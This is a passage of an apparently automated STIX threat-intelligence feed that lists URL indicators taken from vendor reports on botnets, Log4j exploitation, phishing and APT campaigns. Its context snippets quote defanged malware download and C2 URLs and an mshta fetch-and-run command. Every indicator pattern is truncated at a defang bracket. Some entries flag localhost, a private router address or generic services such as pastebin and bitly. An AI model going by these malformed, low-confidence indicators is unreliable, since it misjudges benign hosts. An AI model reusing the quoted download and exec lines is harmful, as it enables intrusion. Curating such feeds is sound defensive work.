Blog","url":"https://www.microsoft.com/en-us/security/blog/2026/09/03/ascii-smuggling-crosses-over-from-ai-prompt-injection-to-phishing-evasion/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e104d5f9-03f0-4776-b084-6ff8f45e63b3","created":"2026-09-03T16:00:00.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: https://＜brand-subdomain＞.activehosted[","description":"Seen in \"ASCII smuggling crosses over from AI prompt injection to phishing evasion\" (Microsoft Security Blog). Context: k like: hxxps://＜account-id＞.acemlnd[.]com/＜tracking-token＞ hxxps://＜brand-subdomain＞.activehosted[.]com/＜tracking-token＞ Most of the flagged messages carried","pattern":"[url:value = 'https://＜brand-subdomain＞.activehosted[']","pattern_type":"stix","valid_from":"2026-09-03T16:00:00.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Microsoft Security Blog","url":"https://www.microsoft.com/en-us/security/blog/2026/09/03/ascii-smuggling-crosses-over-from-ai-prompt-injection-to-phishing-evasion/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--83dc9ee4-a187-48db-92fc-f814707edea4","created":"2026-09-03T10:00:58.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: http://167.148.195[","description":"Seen in \"Attackers Expose Ongoing AI Tool Use Targeting Organizations in Latin America\" (Palo Alto Unit 42). Context: a2cf34f0af1afe161f123a3d200e77f6c6f41b81bf6ae66ee172ec URL: hxxp[:]//167.148.195[.]53:8888/socktz_v9.exe Additional Resources Operation Esc","pattern":"[url:value = 'http://167.148.195[']","pattern_type":"stix","valid_from":"2026-09-03T10:00:58.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/ai-tool-use-targeting-latam-orgs/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b56ca835-87cd-4c39-ac64-e68de8191ed6","created":"2026-09-01T22:48:28.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: http://www.gehie246[","description":"Seen in \"Counterfeit installers to system compromise: Tracking a deceptive software download campaign\" (Microsoft Security Blog). Context: e indicators of compromise below. kaspersky-lab[.]hl[.]cn → hxxp://www.gehie246[.]com/712down pc-razerzone[.]com[.]cn → hxxp://www.gehie246[","pattern":"[url:value = 'http://www.gehie246[']","pattern_type":"stix","valid_from":"2026-09-01T22:48:28.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Microsoft Security Blog","url":"https://www.microsoft.com/en-us/security/blog/2026/09/01/counterfeit-installers-system-compromise-tracking-deceptive-software-download-campaign/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--4279229a-66a2-4f24-b7cc-8356e3803473","created":"2026-09-01T21:30:18.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: https://sistema-ekg3h4htc0h0ggdh.canadacentral-01.azurewebsites[","description":"Seen in \"Guildma (Astaroth) malware infection from Brazilian Portuguese email, (Tue, Sep 1st)\" (SANS Internet Storm Center). Context: 684.BPSE.CONTRATOS.DIGITAIS.pdf Link from the message text: hxxps[:]//sistema-ekg3h4htc0h0ggdh.canadacentral-01.azurewebsites[.]net/ Downloaded zip archive and extracted Windows shortc","pattern":"[url:value = 'https://sistema-ekg3h4htc0h0ggdh.canadacentral-01.azurewebsites[']","pattern_type":"stix","valid_from":"2026-09-01T21:30:18.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"SANS Internet Storm Center","url":"https://isc.sans.edu/diary/rss/33300"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b6d8d948-128b-44ae-b310-b141ea5fefc4","created":"2026-08-28T11:26:52.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: http://webhook[","description":"Seen in \"Russian APT BlueDelta Uses HOOKEDGE to Target Defense and Diplomatic Organizations\" (Security Affairs). Context: o contains a hidden image referencing a remote webhook URL: hxxp://webhook[.]site/62114596-33f5-47fb-9012-0223529e5a13/docopened[.]jpg.","pattern":"[url:value = 'http://webhook[']","pattern_type":"stix","valid_from":"2026-08-28T11:26:52.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Security Affairs","url":"https://securityaffairs.com/197996/apt/russian-apt-bluedelta-uses-hookedge-to-target-defense-and-diplomatic-organizations.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--cbcd5b32-53b1-45c0-af73-5b09843e3902","created":"2026-08-19T12:06:09.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: http://159.89.156[","description":"Seen in \"Muhstik Botnet Attacks Tomato Routers to Harvest New IoT Devices\" (Palo Alto Unit 42). Context: Domains and URLs: hxxp://y.fd6fq54s6df541q23sdxfg[.]eu/nvr hxxp://159.89.156[.]190/.y/pty1 hxxp://159.89.156[.]190/.y/pty3 hxxp://159.89.","pattern":"[url:value = 'http://159.89.156[']","pattern_type":"stix","valid_from":"2026-08-19T12:06:09.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/muhstik-botnet-attacks-tomato-routers-to-harvest-new-iot-devices/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--92eb6cac-65a5-47a4-b531-a0358b58639f","created":"2026-08-19T12:06:09.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: http://165.227.78[","description":"Seen in \"Muhstik Botnet Attacks Tomato Routers to Harvest New IoT Devices\" (Palo Alto Unit 42). Context: nv : Body > < / soapenv : Envelope > We think that this URL hxxp://165.227.78[.]159/wl.php is used for the reporting purpose. Because, the","pattern":"[url:value = 'http://165.227.78[']","pattern_type":"stix","valid_from":"2026-08-19T12:06:09.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/muhstik-botnet-attacks-tomato-routers-to-harvest-new-iot-devices/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ad3b3c69-7abc-4e11-bcee-e4ba93c95983","created":"2026-08-19T12:06:09.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: http://y.fd6fq54s6df541q23sdxfg[","description":"Seen in \"Muhstik Botnet Attacks Tomato Routers to Harvest New IoT Devices\" (Palo Alto Unit 42). Context: .233[.]35 68.66.253[.]100 185.61.149[.]22 Domains and URLs: hxxp://y.fd6fq54s6df541q23sdxfg[.]eu/nvr hxxp://159.89.156[.]190/.y/pty1 hxxp://159.89.156[.","pattern":"[url:value = 'http://y.fd6fq54s6df541q23sdxfg[']","pattern_type":"stix","valid_from":"2026-08-19T12:06:09.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/muhstik-botnet-attacks-tomato-routers-to-harvest-new-iot-devices/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--753307c4-bf91-436a-8638-ca43b9b02ec5","created":"2026-08-19T12:03:53.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: http://192.168.0[","description":"Seen in \"A Deep Dive Into Attempted Exploitation of CVE-2023\" (Palo Alto Unit 42). Context: ted a session token that is reflected in the following URL: hxxp[:]//192.168.0[.]1/WCYCPJQAHXBRCQSC/userRpm/Index.htm As the session toke","pattern":"[url:value = 'http://192.168.0[']","pattern_type":"stix","valid_from":"2026-08-19T12:03:53.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/exploitation-of-cve-2023-33538/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--41b4b63b-a306-4805-b1e5-644d3ae90273","created":"2026-08-19T12:03:38.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: http://127.0.0[","description":"Seen in \"TuxBot v3: Inside an IoT Botnet Framework With LLM\" (Palo Alto Unit 42). Context: CHANNEL #tuxbot TABLE_IRC_NICK_PREFIX tux TABLE_HTTP_C2_URL hxxp[:]//127.0.0[.]1/cmd TABLE_THINKPHP_PAYLOAD Full HTTP GET request (312","pattern":"[url:value = 'http://127.0.0[']","pattern_type":"stix","valid_from":"2026-08-19T12:03:38.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/tuxbot-v3-evolution-iot-botnet/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d5ce8758-6454-4640-be6c-5182c4df0bc3","created":"2026-08-17T13:24:45.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: http://feed43[","description":"Seen in \"Patchwork Continues to Deliver BADNEWS to the Indian Subcontinent\" (Palo Alto Unit 42). Context: rvers 185.203.118[.]115 94.156.35[.]204 Dead Drop Resolvers hxxp://feed43[.]com/8166706728852850.xml hxxp://feed43[.]com/3210021137734","pattern":"[url:value = 'http://feed43[']","pattern_type":"stix","valid_from":"2026-08-17T13:24:45.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/unit42-patchwork-continues-deliver-badnews-indian-subcontinent/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--cb664d9f-c5a6-4446-9de4-fcd4e8bbc577","created":"2026-08-17T13:24:45.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: http://feeds.rapidfeeds[","description":"Seen in \"Patchwork Continues to Deliver BADNEWS to the Indian Subcontinent\" (Palo Alto Unit 42). Context: 622.xml hxxp://www.webrss[.]com/createfeed.php?feedid=49966 hxxp://feeds.rapidfeeds[.]com/88604/ Script to Decrypt Dead Drop Resolvers 1 2 3 4 5","pattern":"[url:value = 'http://feeds.rapidfeeds[']","pattern_type":"stix","valid_from":"2026-08-17T13:24:45.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/unit42-patchwork-continues-deliver-badnews-indian-subcontinent/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2171fab6-5938-4159-99ce-6f1f9e16a160","created":"2026-08-17T13:24:45.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: http://www.webrss[","description":"Seen in \"Patchwork Continues to Deliver BADNEWS to the Indian Subcontinent\" (Palo Alto Unit 42). Context: 66706728852850.xml hxxp://feed43[.]com/3210021137734622.xml hxxp://www.webrss[.]com/createfeed.php?feedid=49966 hxxp://feeds.rapidfeeds[.]","pattern":"[url:value = 'http://www.webrss[']","pattern_type":"stix","valid_from":"2026-08-17T13:24:45.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/unit42-patchwork-continues-deliver-badnews-indian-subcontinent/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--4cbe9ff4-12ad-4b5e-8a79-95a97724f8d3","created":"2026-08-17T13:21:46.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: https://bjm9.blogspot[","description":"Seen in \"Aggah Campaign: Bit.ly, BlogSpot, and Pastebin Used for C2 in Large Scale Campaign\" (Palo Alto Unit 42). Context: WildFire's analysis, the shortened bit.ly URL redirected to hxxps://bjm9.blogspot[.]com/p/si.html , as seen in the “Location” field of the HTT","pattern":"[url:value = 'https://bjm9.blogspot[']","pattern_type":"stix","valid_from":"2026-08-17T13:21:46.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/aggah-campaign-bit-ly-blogspot-and-pastebin-used-for-c2-in-large-scale-campaign/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9525105b-7ea1-4e4a-bf53-6e30dde9f806","created":"2026-08-17T13:21:46.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: https://pastebin[","description":"Seen in \"Aggah Campaign: Bit.ly, BlogSpot, and Pastebin Used for C2 in Large Scale Campaign\" (Palo Alto Unit 42). Context: n to download a script from a Pastebin URL, specifically at hxxps://pastebin[.]com/raw/tb5gHu2G that we will continue to refer to as the","pattern":"[url:value = 'https://pastebin[']","pattern_type":"stix","valid_from":"2026-08-17T13:21:46.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/aggah-campaign-bit-ly-blogspot-and-pastebin-used-for-c2-in-large-scale-campaign/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2d439e50-6012-4156-9276-7d90a407229a","created":"2026-08-17T13:21:46.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: https://static.wixstatic[","description":"Seen in \"Aggah Campaign: Bit.ly, BlogSpot, and Pastebin Used for C2 in Large Scale Campaign\" (Palo Alto Unit 42). Context: t’s footer that attempts to load a remote OLE document from hxxps://static.wixstatic[.]com/ugd/05e470_b104c366c1f7423293887062c7354db2.doc : Figu","pattern":"[url:value = 'https://static.wixstatic[']","pattern_type":"stix","valid_from":"2026-08-17T13:21:46.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/aggah-campaign-bit-ly-blogspot-and-pastebin-used-for-c2-in-large-scale-campaign/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--df5a3ca3-dd60-48b8-b6af-e54d1c8f15f6","created":"2026-08-17T13:21:46.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: http://www.bitly[","description":"Seen in \"Aggah Campaign: Bit.ly, BlogSpot, and Pastebin Used for C2 in Large Scale Campaign\" (Palo Alto Unit 42). Context: nd execute the following URL via the \"Shell\" command: mshta hxxp://www.bitly[.]com/SmexEaldos3 The command above uses the built-in “mshta","pattern":"[url:value = 'http://www.bitly[']","pattern_type":"stix","valid_from":"2026-08-17T13:21:46.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/aggah-campaign-bit-ly-blogspot-and-pastebin-used-for-c2-in-large-scale-campaign/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2667e42f-0aae-42c3-a207-ebbb9690a685","created":"2026-08-17T13:04:23.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: http://163.123.143[","description":"Seen in \"Old Wine in the New Bottle: Mirai Variant Targets Multiple IoT Devices\" (Palo Alto Unit 42). Context: and executed, to accommodate different Linux architectures: hxxp://163.123.143[.]126/bins/dark.x86 hxxp://163.123.143[.]126/bins/dark.mips","pattern":"[url:value = 'http://163.123.143[']","pattern_type":"stix","valid_from":"2026-08-17T13:04:23.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/mirai-variant-iz1h9/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--0c9d7bc4-087f-4843-842c-60a882e670cd","created":"2026-08-17T13:04:23.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: http://212.192.241[","description":"Seen in \"Old Wine in the New Bottle: Mirai Variant Targets Multiple IoT Devices\" (Palo Alto Unit 42). Context: ng more shell script downloaders: hxxp://2.56.59[.]215/i.sh hxxp://212.192.241[.]72/lolol.sh Figure 2 is a diagram illustrating the campaig","pattern":"[url:value = 'http://212.192.241[']","pattern_type":"stix","valid_from":"2026-08-17T13:04:23.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/mirai-variant-iz1h9/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--550b2f2c-3e83-442e-89bf-dc2641c0094d","created":"2026-08-17T13:04:23.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: http://2.56.59[","description":"Seen in \"Old Wine in the New Bottle: Mirai Variant Targets Multiple IoT Devices\" (Palo Alto Unit 42). Context: s and found two URLs hosting more shell script downloaders: hxxp://2.56.59[.]215/i.sh hxxp://212.192.241[.]72/lolol.sh Figure 2 is a di","pattern":"[url:value = 'http://2.56.59[']","pattern_type":"stix","valid_from":"2026-08-17T13:04:23.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/mirai-variant-iz1h9/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e10136db-5e6e-41a5-ae2f-dc10b236ffd4","created":"2026-08-17T13:04:23.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: http://31.210.20[","description":"Seen in \"Old Wine in the New Bottle: Mirai Variant Targets Multiple IoT Devices\" (Palo Alto Unit 42). Context: URLs in the malware samples that hosted two shell scripts: hxxp://31.210.20[.]100/lolol[.]sh hxxp://212.192.241[.]72/lolol[.]sh The shel","pattern":"[url:value = 'http://31.210.20[']","pattern_type":"stix","valid_from":"2026-08-17T13:04:23.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/mirai-variant-iz1h9/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--21336a7c-89c6-4cfc-9123-aa027877a3e2","created":"2026-08-17T13:04:05.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: http://185.225.74[","description":"Seen in \"IoT Under Siege: The Anatomy of the Latest Mirai Campaign Leveraging Multiple IoT Exploits\" (Palo Alto Unit 42). Context: g bot clients to accommodate different Linux architectures: hxxp://185.225.74[.]251/armv4l hxxp://185.225.74[.]251/armv5l hxxp://185.225.7","pattern":"[url:value = 'http://185.225.74[']","pattern_type":"stix","valid_from":"2026-08-17T13:04:05.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/mirai-variant-targets-iot-exploits/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f9bbc8fe-4062-4832-ab61-b0df6cf4820b","created":"2026-08-17T13:04:05.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: http://zvub[","description":"Seen in \"IoT Under Siege: The Anatomy of the Latest Mirai Campaign Leveraging Multiple IoT Exploits\" (Palo Alto Unit 42). Context: o download a shell script downloader as a file named y from hxxp://zvub[.]us/ . If executed, the shell script downloader would downl","pattern":"[url:value = 'http://zvub[']","pattern_type":"stix","valid_from":"2026-08-17T13:04:05.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/mirai-variant-targets-iot-exploits/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--793ba2f7-9a69-4abc-8c7b-b1cc7fdd6197","created":"2026-08-17T12:55:06.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: http://games.my-homeip[","description":"Seen in \"Bisonal Malware Used in Attacks Against Russia and South Korea\" (Palo Alto Unit 42). Context: the RC4 cipher with the same key “78563412”. It connects to hxxp://games.my-homeip[.]com:443/ks8d[ip address]akspbu.txt by using the HTTP POST","pattern":"[url:value = 'http://games.my-homeip[']","pattern_type":"stix","valid_from":"2026-08-17T12:55:06.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/unit42-bisonal-malware-used-attacks-russia-south-korea/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--dfc2b903-5a82-4848-82bb-5174fedb2b35","created":"2026-08-17T12:45:38.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: http://178.16.54[","description":"Seen in \"Almost Half of Malware Samples Communicate Direct to IP\" (Palo Alto Unit 42). Context: th several malware samples (e.g., the binary retrieved from hxxp[:]//178.16.54[.]109/st.exe ) associated with Phorpiex (aka Trik), a long","pattern":"[url:value = 'http://178.16.54[']","pattern_type":"stix","valid_from":"2026-08-17T12:45:38.000Z","labels":["auto-extracted","research"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/malware-bypass-dns-direct-to-ip/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--af3a5e37-0747-4f48-b4de-c419b017dbc8","created":"2026-08-17T12:20:33.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: http://139.155.2[","description":"Seen in \"Another Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021\" (Palo Alto Unit 42). Context: ava class file from a remote server. The EvilObj.class from hxxp://139.155.2[.]105:8081 contains the decompiled Java code as seen in Figu","pattern":"[url:value = 'http://139.155.2[']","pattern_type":"stix","valid_from":"2026-08-17T12:20:33.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e3301da0-30e9-41fa-977a-b7cddda95f08","created":"2026-08-17T12:20:33.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: http://150.60.139[","description":"Seen in \"Another Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021\" (Palo Alto Unit 42). Context: s and execute them. The first file downloaded was hosted at hxxp://150.60.139[.]51:80/wp-content/themes/twentyseventeen/s.cmd , which cont","pattern":"[url:value = 'http://150.60.139[']","pattern_type":"stix","valid_from":"2026-08-17T12:20:33.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--164a46fc-c496-4c47-b4ab-751d13a60718","created":"2026-08-17T12:20:33.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: http://161.35.184[","description":"Seen in \"Another Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021\" (Palo Alto Unit 42). Context: e above, the server would download a Java class file from a hxxp://161.35.184[.]54:9998/V8.class URL, which responds with a Java class fil","pattern":"[url:value = 'http://161.35.184[']","pattern_type":"stix","valid_from":"2026-08-17T12:20:33.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2783d4fa-acdc-49fc-93a6-e715c691db88","created":"2026-08-17T12:20:33.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: http://165.22.2[","description":"Seen in \"Another Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021\" (Palo Alto Unit 42). Context: that provides the Java class that installs a coinminer. The hxxp://165.22.2[.]186:80/wp-content/themes/twentyseventeen/Exploit.class res","pattern":"[url:value = 'http://165.22.2[']","pattern_type":"stix","valid_from":"2026-08-17T12:20:33.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--24ef114e-7c2e-4ace-a850-5e56cecd9151","created":"2026-08-17T12:20:33.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: http://2.57.121[","description":"Seen in \"Another Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021\" (Palo Alto Unit 42). Context: cessing this URL, the server would access a Java class from hxxp://2.57.121[.]36/Rjava.class , which contained the decompiled code seen","pattern":"[url:value = 'http://2.57.121[']","pattern_type":"stix","valid_from":"2026-08-17T12:20:33.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--5adb5f8b-52d6-44ba-baeb-8a144d2758f2","created":"2026-08-17T12:20:33.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: http://68.183.165[","description":"Seen in \"Another Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021\" (Palo Alto Unit 42). Context: ommand attempts to download and execute an application from hxxp://68.183.165[.]105:80/wp-content/themes/twentyseventeen/xmrig64.exe , whi","pattern":"[url:value = 'http://68.183.165[']","pattern_type":"stix","valid_from":"2026-08-17T12:20:33.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9c5e12c9-1b19-4317-aeb1-989dc160710b","created":"2026-08-17T12:20:33.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: http://[hostname","description":"Seen in \"Another Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021\" (Palo Alto Unit 42). Context: The HTTP POST requests would be sent to the following URLs: hxxp://[hostname].[username]8.pef.mur.1ma[.]xyz/ hxxp://[hostname].[username","pattern":"[url:value = 'http://[hostname']","pattern_type":"stix","valid_from":"2026-08-17T12:20:33.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--615ee609-6b02-4d87-a47b-f6f5620a2d01","created":"2026-08-17T12:20:33.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: https://[hostname","description":"Seen in \"Another Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021\" (Palo Alto Unit 42). Context: [.]xyz/ hxxp://[hostname].[username]5.pef.mur.1ma[.]xyz:53/ hxxps://[hostname].[username]4.pef.mur.1ma[.]xyz/ The DNS tunneling involves","pattern":"[url:value = 'https://[hostname']","pattern_type":"stix","valid_from":"2026-08-17T12:20:33.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--957d4bc9-b5e1-4174-a117-a2a94acaecdc","created":"2026-08-17T12:20:00.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: https://cdn.discordapp[","description":"Seen in \"Threat Brief: Ongoing Russia and Ukraine Cyber Activity\" (Palo Alto Unit 42). Context: cious. The hosted file is retrieved from the following URL: hxxps://cdn.discordapp[.]com/attachments/928503440139771947/930108637681184768/Tbop","pattern":"[url:value = 'https://cdn.discordapp[']","pattern_type":"stix","valid_from":"2026-08-17T12:20:00.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 